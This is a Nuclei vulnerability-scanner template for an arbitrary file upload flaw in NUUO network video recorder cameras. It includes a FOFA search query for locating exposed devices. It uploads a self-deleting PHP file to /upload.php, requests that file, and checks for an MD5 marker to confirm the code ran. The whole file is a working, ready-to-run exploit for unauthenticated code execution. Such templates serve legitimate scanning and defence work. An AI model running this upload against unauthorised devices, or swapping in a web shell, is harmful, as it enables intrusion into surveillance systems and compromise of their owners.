id: NUUONVR-upload-FileUpload

info:
  name: NUUO NVR摄像头-任意文件上传-upload
  author: Final
  severity: high
  metadata: 
    fofa-query: title=Network Video Recorder Login
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        @timeout: 30s
        POST /upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
        Connection: close
        Content-Type: multipart/form-data; boundary=--------969849961
        Content-Length: 157

        ----------969849961
        Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php"

        <?php echo md5('666');@unlink(__FILE__);?>
        ----------969849961--

      - |
        @timeout: 30s
        GET /{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla5.0 (Windows NT 10.0; Win64; x64) AppleWebKit537.36 (KHTML, like Gecko) Chrome83.0.4103.116 Safari537.36
        Content-Length: 0

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"b27c451c728867a567e8c1bb")'
